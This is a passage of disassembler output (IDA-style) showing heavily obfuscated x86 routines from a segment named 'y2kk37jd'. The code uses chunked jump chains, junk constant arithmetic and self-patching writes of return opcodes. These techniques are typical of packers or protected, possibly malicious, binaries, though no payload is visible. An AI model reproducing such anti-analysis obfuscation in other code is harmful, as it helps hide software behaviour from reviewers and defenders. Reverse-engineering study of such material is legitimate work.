; FUNCTION CHUNK AT 00444FF7 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 00445B98 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004460AA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044823A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044878C SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044A090 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C851 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044CA3C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD32 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044D596 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044EAC9 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004516F8 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453186 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004540A6 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00454F0A SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454FB8 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004562F5 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045734D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457D71 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00458650 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00459EA0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AB49 SIZE 00000017 BYTES

		add	eax, ebp
		add	eax, 0E4212A28h
		mov	eax, [eax]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44CD37
		jmp	loc_44823A
sub_448700	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_448718	proc near		; CODE XREF: y2kk37jd:0044CE96j
					; sub_458161p

; FUNCTION CHUNK AT 00452C45 SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		push	esi
		mov	esi, ebp
		xchg	esi, [esp+0]
		mov	ebp, esp
		jmp	loc_452C45
sub_448718	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459A7D

loc_448729:				; CODE XREF: sub_459A7D-1AD04j
		or	ebp, edi
		xor	edx, eax
		push	eax

loc_44872E:				; CODE XREF: sub_459A7D:loc_43ED71j
		rol	edx, 3
		jmp	loc_44C27E
; END OF FUNCTION CHUNK	FOR sub_459A7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44606C

loc_448736:				; CODE XREF: sub_44606C-5C51j
		rol	edx, 10h

loc_448739:				; CODE XREF: y2kk37jd:loc_443719j
		xor	edx, 482C7377h
		or	edx, ds:4000EBh
		test	edx, 4000h
		jmp	loc_44093F
; END OF FUNCTION CHUNK	FOR sub_44606C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C104

loc_448750:				; CODE XREF: sub_45C104+10j
		rol	ebx, 1Eh
		jb	loc_441235
		or	edx, 0CEF5175Dh
		jo	loc_446EC0
		popf
		mov	edx, 92E75D85h
		jmp	loc_441233
; END OF FUNCTION CHUNK	FOR sub_45C104

; =============== S U B	R O U T	I N E =======================================



sub_448770	proc near		; CODE XREF: y2kk37jd:00444A4Dj
					; sub_448700-36F1p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044857F SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044A7FC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C4F8 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0044F2E1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F2F1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004539E5 SIZE 0000000B BYTES

		xchg	ecx, [esp+0]
		pop	ecx
		add	eax, ebp
		add	eax, 45C648F3h
		mov	eax, [eax]

loc_44877E:				; CODE XREF: sub_448DCA+4A4j
		cmp	byte ptr [eax],	0F1h
		jnz	loc_44F2F1

loc_448787:				; CODE XREF: sub_43ED19:loc_446EBAj
		jmp	loc_4539E5
sub_448770	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44878C:				; CODE XREF: sub_448700:loc_4562F5j
		test	eax, 1DF1AB66h
		jmp	loc_444FF7
; END OF FUNCTION CHUNK	FOR sub_448700

; =============== S U B	R O U T	I N E =======================================



sub_448797	proc near		; CODE XREF: sub_445226:loc_43BA0Cp
					; y2kk37jd:0044A638j

arg_0		= dword	ptr  4
arg_4		= dword	ptr  8

; FUNCTION CHUNK AT 004477EF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044B21D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044F67D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004565AB SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045BDF7 SIZE 0000000B BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4565B8
		jmp	loc_45BDF7
sub_448797	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4487AC:				; CODE XREF: y2kk37jd:loc_4407C6j
		sub	ecx, 1D829D72h
		xor	ecx, 77988B6Eh
		add	ecx, ebp
		add	ecx, 5E04D612h
		mov	[ecx], eax
		pop	ecx
		jmp	loc_444D80
; ---------------------------------------------------------------------------

loc_4487C8:				; DATA XREF: sub_441F5E:loc_44CFE6o
		push	61601E78h
		pop	eax
		and	eax, 0B0032A72h
		or	eax, 0C60E4DDEh
		add	eax, 8BB878C6h
		add	eax, ebp
		add	eax, 8E393738h
		mov	eax, [eax]
		jmp	loc_44B779
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445B38

loc_4487EF:				; CODE XREF: sub_445B38+10A84j
		mov	ebp, edi
		pop	edi
		retn
; END OF FUNCTION CHUNK	FOR sub_445B38
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442F52

loc_4487F3:				; CODE XREF: sub_442F52+EADEj
		jmp	loc_45774B
; END OF FUNCTION CHUNK	FOR sub_442F52
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_4487F8:				; CODE XREF: sub_43EF4F+CB5Fj
		jmp	loc_43C8B1
; END OF FUNCTION CHUNK	FOR sub_43EF4F

; =============== S U B	R O U T	I N E =======================================



sub_4487FD	proc near		; CODE XREF: sub_43B4CB:loc_43B4DFj
					; y2kk37jd:loc_43D9C6p	...

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044F3B4 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004514FE SIZE 00000012 BYTES
; FUNCTION CHUNK AT 00456C4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458464 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459017 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00459B75 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AD15 SIZE 00000002 BYTES

		push	ecx
		mov	ecx, ebp
		jmp	loc_44F3B4
sub_4487FD	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545F7

loc_448805:				; CODE XREF: sub_4545F7+Bj
		pop	edx
		sub	edx, 0E5D90F68h
		rol	edx, 1Ah
		sub	edx, 2F0F135Dh
; END OF FUNCTION CHUNK	FOR sub_4545F7
; START	OF FUNCTION CHUNK FOR sub_45447D

loc_448815:				; CODE XREF: sub_45447D-554Bj
		rol	edx, 6
		add	edx, 8A03A915h
		push	offset sub_445EBA
		jmp	nullsub_144
; END OF FUNCTION CHUNK	FOR sub_45447D
; ---------------------------------------------------------------------------

loc_448828:				; CODE XREF: y2kk37jd:00451085j
		mov	ebp, ebx
		push	171B395Ah

loc_44882F:				; CODE XREF: y2kk37jd:loc_451076j
		xor	eax, 0D2CEA6E1h
		cmp	eax, 0BD964C39h
		jmp	loc_453162
; ---------------------------------------------------------------------------

loc_448840:				; DATA XREF: sub_447918o
		mov	dword ptr [eax], 0
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A47C

loc_448847:				; CODE XREF: sub_45A47C+Dj
		jmp	loc_445512
; END OF FUNCTION CHUNK	FOR sub_45A47C
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]

; =============== S U B	R O U T	I N E =======================================



sub_44884D	proc near		; CODE XREF: sub_443BAF:loc_43D31Cp
					; sub_44E648:loc_43D512p ...

; FUNCTION CHUNK AT 0043D403 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00446041 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044AF06 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00450721 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00452D07 SIZE 00000016 BYTES

		jno	sub_443ECB
		push	ebp
		jmp	loc_450721
sub_44884D	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B163

loc_448859:				; CODE XREF: sub_43B163:loc_445848j
		and	edi, 777DDE14h
		pushf
		jmp	loc_44D501
; END OF FUNCTION CHUNK	FOR sub_43B163

; =============== S U B	R O U T	I N E =======================================



sub_448865	proc near		; DATA XREF: y2kk37jd:0045533Co

; FUNCTION CHUNK AT 00451652 SIZE 00000005 BYTES

		call	sub_440CD1
		push	offset loc_45064E
		jmp	loc_451652
sub_448865	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_472. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AFF6

loc_448875:				; CODE XREF: sub_44AFF6:loc_4523E5j
		pop	ebx
		mov	eax, ds:dword_444AD0
		or	eax, eax

loc_44887E:				; CODE XREF: sub_457524-147DBj
		jnz	loc_448C49
		jmp	loc_4509F0
; END OF FUNCTION CHUNK	FOR sub_44AFF6
; ---------------------------------------------------------------------------
		db 0Fh,	8Ah, 0F5h
		dd 0E900006Fh, 0FFFFD353h
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45219E

loc_448894:				; CODE XREF: sub_45219E+13j
		call	sub_44D51F
		mov	edx, [ebp-8]
		mov	eax, [ebp-4]
		call	nullsub_238
		pop	ecx
		pop	ecx
		pop	ebp
; END OF FUNCTION CHUNK	FOR sub_45219E
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_4488A7:				; CODE XREF: sub_43ED86:loc_447A5Aj
					; sub_44C4BC:loc_458C75j
		jmp	loc_44C5F9
; END OF FUNCTION CHUNK	FOR sub_43ED86

; =============== S U B	R O U T	I N E =======================================



sub_4488AC	proc near		; DATA XREF: sub_448512+12650o

; FUNCTION CHUNK AT 0044D75A SIZE 00000014 BYTES

		xchg	esi, [esp+0]
		rol	ebx, 9
		jmp	loc_44D75A
sub_4488AC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

locret_4488B7:				; CODE XREF: y2kk37jd:loc_45B4EAj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E20

loc_4488B8:				; CODE XREF: sub_454E20+5F7j
		jmp	loc_44CA7C
; END OF FUNCTION CHUNK	FOR sub_454E20
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A6E9

loc_4488BD:				; CODE XREF: sub_44A6E9-B560j
		and	edx, 0EF047D94h
		sub	edx, 0F8E82B32h
		xor	edx, 5302A9F6h
		push	offset sub_44AAA1
		jmp	loc_4464DF
; END OF FUNCTION CHUNK	FOR sub_44A6E9
; ---------------------------------------------------------------------------
		pop	ecx
		jmp	loc_45A62C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E9F

loc_4488DF:				; CODE XREF: sub_451E9F:loc_4441E9j
		test	byte ptr [ebp-8], 40h
		jz	loc_43EF77
		push	ebp

loc_4488EA:				; CODE XREF: sub_44FB21-AABFj
		mov	eax, [ebp-20h]
		jmp	loc_44E2B0
; END OF FUNCTION CHUNK	FOR sub_451E9F
; ---------------------------------------------------------------------------

loc_4488F2:				; CODE XREF: y2kk37jd:loc_43CE8Fj
		push	offset loc_443BED
		jmp	locret_45942E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_4488FC:				; CODE XREF: sub_453867:loc_456FF1j
		jz	loc_44F394
		jmp	loc_448C59
; END OF FUNCTION CHUNK	FOR sub_453867
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_180. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442829

loc_448908:				; CODE XREF: sub_442829+F4F6j
		jmp	loc_449D55
; END OF FUNCTION CHUNK	FOR sub_442829
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44890D:				; CODE XREF: sub_445226-80D7j
		jmp	sub_43B582
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45BC3F

loc_448912:				; CODE XREF: sub_45BC3F+Aj
		jz	loc_4452FC
		jmp	loc_45AFBC
; END OF FUNCTION CHUNK	FOR sub_45BC3F
; ---------------------------------------------------------------------------

loc_44891D:				; CODE XREF: y2kk37jd:0044D251j
		xchg	edi, [esp]
		mov	ecx, edi
		pop	edi
		rol	ecx, 14h
		jmp	loc_44628A
; ---------------------------------------------------------------------------

loc_44892B:				; DATA XREF: sub_44AAA1+3A34o
		mov	eax, [eax-8]
		or	eax, 8
		or	eax, 10h
		mov	edx, [ebp+8]
		mov	[edx-8], eax
		jmp	loc_459E0A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_44893F:				; CODE XREF: sub_44AAA1+3A2Bj
		push	offset sub_45285F
		jmp	nullsub_208
; END OF FUNCTION CHUNK	FOR sub_44AAA1

; =============== S U B	R O U T	I N E =======================================

; Attributes: thunk


sub_448949	proc near		; CODE XREF: sub_44606C+13B57j
		retn
sub_448949	endp


; =============== S U B	R O U T	I N E =======================================



sub_44894A	proc near		; CODE XREF: y2kk37jd:0044016Ep
					; y2kk37jd:0045B904j
		xchg	edx, [esp+0]
		pop	edx
		xor	eax, 736EC65Bh
		call	sub_456742

loc_448959:				; CODE XREF: sub_4412BF-C91j
		jmp	sub_440CD1
sub_44894A	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44895E:				; CODE XREF: sub_4458DD:loc_44F510j
		or	eax, eax
		jnz	loc_443D21
		jmp	loc_43D49A
; END OF FUNCTION CHUNK	FOR sub_4458DD

; =============== S U B	R O U T	I N E =======================================



sub_44896B	proc near		; DATA XREF: sub_44625E+1163Eo

var_8		= dword	ptr -8

; FUNCTION CHUNK AT 0044903E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0044C3C5 SIZE 00000011 BYTES

		xor	eax, 27DF5640h
		add	eax, ebp
		add	eax, 2A59614Bh
		mov	eax, [eax]
		popf
		push	edx
		pushf
		jmp	loc_44903E
sub_44896B	endp

; ---------------------------------------------------------------------------
		xchg	ebx, [ebp+0]
		jle	loc_44E092
		jmp	sub_44289F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45913D

loc_448991:				; CODE XREF: sub_45913D-D437j
		jb	loc_43C36E
		shl	edi, 8
		add	ebp, ecx
		not	edi
		jmp	loc_44E5CE
; END OF FUNCTION CHUNK	FOR sub_45913D
; ---------------------------------------------------------------------------
		rol	edi, 14h
		jmp	sub_44A33C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448C11

loc_4489AB:				; CODE XREF: sub_448C11+E173j
					; sub_4507BF:loc_4591EFj
		push	0
		push	0
		push	10h
; END OF FUNCTION CHUNK	FOR sub_448C11
; START	OF FUNCTION CHUNK FOR sub_448CAE

loc_4489B1:				; CODE XREF: sub_448CAE:loc_44A614j
		push	79F2688Dh
		pop	eax

loc_4489B7:				; CODE XREF: y2kk37jd:loc_44FA80j
		and	eax, 0A10B56ABh
		sub	eax, 77BFAEE5h
		xor	eax, 2FEF5AC4h
		jmp	loc_43DD7B
; END OF FUNCTION CHUNK	FOR sub_448CAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_4489CE:				; CODE XREF: sub_4429DD+12A62j
		xchg	ebx, [esp+0]
		jmp	sub_4526B7
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CA5B

loc_4489D6:				; CODE XREF: sub_43CA5B+A2C8j
		jz	loc_447E5E
		jmp	loc_4521B6
; END OF FUNCTION CHUNK	FOR sub_43CA5B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4514DE

loc_4489E1:				; CODE XREF: sub_4514DE-A609j
		add	eax, 0F6150BC3h
		call	sub_43F75D

loc_4489EC:				; CODE XREF: sub_43E679+1C797j
		jmp	loc_440342
; END OF FUNCTION CHUNK	FOR sub_4514DE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_4489F1:				; CODE XREF: sub_445226-8553j
		jmp	loc_44F728
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------

loc_4489F6:				; CODE XREF: y2kk37jd:00454A23j
		ja	loc_45461D
		add	edx, ebp
; START	OF FUNCTION CHUNK FOR sub_447407

loc_4489FE:				; CODE XREF: sub_447407:loc_4536AAj
		or	eax, 0D4BF5D2h
		add	eax, 80582B26h
		xchg	eax, [esp+8+var_8]
		jmp	sub_4476EE
; END OF FUNCTION CHUNK	FOR sub_447407

; =============== S U B	R O U T	I N E =======================================



sub_448A12	proc near		; DATA XREF: sub_45801A+Do

; FUNCTION CHUNK AT 0043B041 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043BED6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440318 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00445B1C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446A12 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00451B35 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00454472 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454FA9 SIZE 00000005 BYTES

		mov	eax, [eax]
		jmp	loc_454FA9
sub_448A12	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45024B

loc_448A19:				; CODE XREF: sub_45024B+5CA6j
					; sub_45024B+5CAFj ...
		xor	ebx, ebx

loc_448A1B:				; CODE XREF: sub_45024B:loc_455EE3j
		mov	eax, ebx
		pop	ecx
		jmp	loc_443BDD
; END OF FUNCTION CHUNK	FOR sub_45024B
; ---------------------------------------------------------------------------

loc_448A23:				; CODE XREF: y2kk37jd:loc_446700j
		add	esp, 0FFFFFED0h
		push	edx
		mov	edx, edi
		xchg	edx, [esp]
		push	0B7988617h
		jmp	loc_456F6E
; ---------------------------------------------------------------------------
		push	131FEC05h
		jmp	sub_4466E0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457A46

loc_448A43:				; CODE XREF: sub_457A46-9ACDj
		jnb	loc_455D81
		and	ecx, 86D5A840h
		jmp	loc_4548C7
; ---------------------------------------------------------------------------

loc_448A54:				; CODE XREF: sub_457A46:loc_457A4Ej
		mov	eax, ds:dword_4516B8
		mov	edx, [ebp-4]
		mov	byte ptr [eax+edx], 0
		inc	dword ptr [ebp-4]
		cmp	dword ptr [ebp-4], 100h
		jnz	loc_457A4E
		jmp	loc_441667
; END OF FUNCTION CHUNK	FOR sub_457A46

; =============== S U B	R O U T	I N E =======================================



sub_448A75	proc near		; DATA XREF: sub_441AAB+DD65o
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_76
sub_448A75	endp

; ---------------------------------------------------------------------------
		call	nullsub_10
		jmp	ds:dword_41E148
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_10. PRESS	KEYPAD "+" TO EXPAND]
		dd offset loc_45B8DF
; ---------------------------------------------------------------------------
		jmp	loc_43DF12
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_326. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44610D

loc_448A93:				; CODE XREF: sub_44610D-7771j
		jmp	loc_45C559
; END OF FUNCTION CHUNK	FOR sub_44610D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43ED86

loc_448A98:				; CODE XREF: sub_43ED86:loc_4561E5j
		test	ebp, edi
		jmp	loc_44B95F
; END OF FUNCTION CHUNK	FOR sub_43ED86
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449C4F

loc_448A9F:				; CODE XREF: sub_449C4F:loc_4459AAj
		jnz	loc_43E356
		jmp	loc_45625C
; END OF FUNCTION CHUNK	FOR sub_449C4F

; =============== S U B	R O U T	I N E =======================================



sub_448AAA	proc near		; CODE XREF: sub_43B590+Ap
					; y2kk37jd:004594D9j

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044C98E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00452D64 SIZE 0000001B BYTES

		xchg	edx, [esp+0]

loc_448AAD:				; CODE XREF: sub_4514DE:loc_453039j
		pop	edx
		push	0FCD9CC2Ch
		pop	ebx
		rol	ebx, 0Dh
		call	sub_44B836

loc_448ABC:				; CODE XREF: y2kk37jd:loc_454C8Bj
		push	0BDE6C2A5h
		not	eax
		jmp	loc_452D64
sub_448AAA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		mov	esi, 2BF6370Ah
		and	edi, 0E7A273B9h
		jmp	sub_442376
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_448AD8:				; CODE XREF: sub_4458DD:loc_44D7AEj
		call	sub_4504BC

loc_448ADD:				; CODE XREF: sub_44610D+16452j
		jmp	loc_44CBC8
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_448AE2:				; CODE XREF: sub_445226+4416j
		jmp	nullsub_58
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44001E

loc_448AE7:				; CODE XREF: sub_44001E+72A6j
		jmp	loc_4575B9
; END OF FUNCTION CHUNK	FOR sub_44001E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B814

loc_448AEC:				; CODE XREF: sub_44B814:loc_43D066j
		mov	ebp, 0B843D5Ah
		jmp	loc_442F96
; END OF FUNCTION CHUNK	FOR sub_44B814
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_448AF6:				; CODE XREF: sub_43C851:loc_451399j
		mov	eax, [ebp-10h]
		push	eax
		mov	edx, eax
		call	sub_43B949
; END OF FUNCTION CHUNK	FOR sub_43C851
; START	OF FUNCTION CHUNK FOR sub_44C4BC

loc_448B01:				; CODE XREF: sub_44C4BC+C7C7j
		jmp	loc_4599BA
; END OF FUNCTION CHUNK	FOR sub_44C4BC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444825

loc_448B06:				; CODE XREF: sub_444825+130D9j
		cmp	edx, 369890F2h
		jmp	loc_440D09
; END OF FUNCTION CHUNK	FOR sub_444825
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44036F

loc_448B11:				; CODE XREF: sub_44036F+Aj
		xchg	esi, [esp+4+var_4]
		mov	edi, esi
		pop	esi
		xor	edi, 9EBA9066h
		jmp	loc_43B7C0
; END OF FUNCTION CHUNK	FOR sub_44036F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456809

loc_448B22:				; CODE XREF: sub_456809-AE15j
		jnb	loc_450D90
		mov	esi, [ebp+0]

loc_448B2B:				; CODE XREF: sub_456809:loc_45A6B4j
		cmp	dword ptr [ebp-10h], 0
		setnz	byte ptr [ebp-5]
; END OF FUNCTION CHUNK	FOR sub_456809
; START	OF FUNCTION CHUNK FOR sub_4429DD

loc_448B33:				; CODE XREF: sub_4429DD-7030j
					; sub_4429DD-56AEj ...
		push	ecx
		push	365715FDh
		pop	ecx
		xor	ecx, 0DFDC9C6Fh
		jmp	loc_4491DF
; END OF FUNCTION CHUNK	FOR sub_4429DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444825

loc_448B45:				; CODE XREF: sub_444825+BCF3j
		rol	eax, 6
		ja	loc_43E2DA
		cmp	ebx, ecx
		jmp	loc_4578F6
; END OF FUNCTION CHUNK	FOR sub_444825
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454539

loc_448B55:				; CODE XREF: sub_454539-853Cj
		cmp	ecx, 34003E12h
		jmp	loc_4446B8
; END OF FUNCTION CHUNK	FOR sub_454539
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC38

loc_448B60:				; CODE XREF: sub_44DC38+8j
		or	ebx, eax
		and	ecx, eax
		add	eax, ebx
		rol	ecx, 6
		jmp	loc_457909
; END OF FUNCTION CHUNK	FOR sub_44DC38
; ---------------------------------------------------------------------------

loc_448B6E:				; DATA XREF: sub_44BD20-E7C6o
		mov	ds:off_41E0F8, eax
		lea	eax, loc_44CF22
		mov	byte ptr [eax],	0C3h
; START	OF FUNCTION CHUNK FOR sub_44AAA1

loc_448B7D:				; CODE XREF: sub_44AAA1+6BC9j
		jmp	loc_44CF22
; END OF FUNCTION CHUNK	FOR sub_44AAA1
; ---------------------------------------------------------------------------
		call	nullsub_394
		jmp	ds:dword_41E0FC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454413

loc_448B8D:				; CODE XREF: sub_454413-12398j
		jmp	loc_459DA5
; END OF FUNCTION CHUNK	FOR sub_454413
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_394. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	dl, ch
		add	al, 0
		add	[edx-75h], bl
		add	al, 24h
		jmp	loc_44F86E
; ---------------------------------------------------------------------------
		push	esi
		shl	ecx, 13h
		jmp	sub_45C6B8
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------

loc_448BAB:				; CODE XREF: y2kk37jd:0045B8F7j
		push	ecx
		push	0DA335E2h
		pop	ecx
		rol	ecx, 14h
		xor	ecx, 92EFD888h
		sub	ecx, 8028CA8Ch
		jmp	loc_457089
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44113A

loc_448BC6:				; CODE XREF: sub_44113A:loc_43B630j
		push	1E54221h
		pop	eax
		and	eax, 0D2BC1512h
		xor	eax, 0B1F59286h
		add	eax, ebp
		push	offset loc_44CF98
		jmp	loc_454F43
; END OF FUNCTION CHUNK	FOR sub_44113A
; ---------------------------------------------------------------------------

loc_448BE4:				; CODE XREF: y2kk37jd:004404E3j
		xchg	ebx, [esp]
		pop	ebx
		mov	eax, [esp]
		push	edx
		jmp	loc_4539C4
; ---------------------------------------------------------------------------

loc_448BF1:				; CODE XREF: y2kk37jd:00442FD4j
		push	0FD46F581h
		xchg	ebp, [esp]
		mov	edi, ebp
		pop	ebp
		and	edi, 0A41F366Ch
		jmp	loc_43D5EC
; ---------------------------------------------------------------------------

loc_448C07:				; DATA XREF: y2kk37jd:loc_455AFCo
		rol	eax, 0Fh
		push	eax
		call	sub_4526B7
		retn

; =============== S U B	R O U T	I N E =======================================



sub_448C11	proc near		; CODE XREF: sub_45B7AA:loc_43DFDFj
					; y2kk37jd:loc_441957p	...

; FUNCTION CHUNK AT 004489AB SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00456D74 SIZE 00000015 BYTES

		call	sub_44B508

loc_448C16:				; CODE XREF: sub_4507BF+8A36j
		jmp	loc_456D74
sub_448C11	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446C4E

loc_448C1B:				; CODE XREF: sub_446C4E+5BC5j
		jmp	sub_4460D0
; END OF FUNCTION CHUNK	FOR sub_446C4E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E679

loc_448C20:				; CODE XREF: sub_43E679+8B0Ej
		jmp	loc_4515DC
; END OF FUNCTION CHUNK	FOR sub_43E679
; ---------------------------------------------------------------------------

locret_448C25:				; CODE XREF: y2kk37jd:loc_44182Ej
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4567FD

loc_448C26:				; CODE XREF: sub_4567FD+7j
		jmp	loc_44F115
; END OF FUNCTION CHUNK	FOR sub_4567FD
; ---------------------------------------------------------------------------
		push	0E7CD242Dh
		pop	eax
		and	eax, 0D182AB0h
		add	eax, 0C69D630h
		push	ebx
		push	353C181Ah
		pop	ebx
		jmp	loc_442876
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_448C49:				; CODE XREF: sub_44B508-8EAFj
					; sub_44AFF6:loc_44887Ej
		push	offset sub_447DB2
		jmp	loc_4465A8
; END OF FUNCTION CHUNK	FOR sub_44B508

; =============== S U B	R O U T	I N E =======================================



sub_448C53	proc near		; DATA XREF: sub_445226+1179Bo

; FUNCTION CHUNK AT 0043FA6A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F38B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00450C4E SIZE 0000000B BYTES

		push	edx
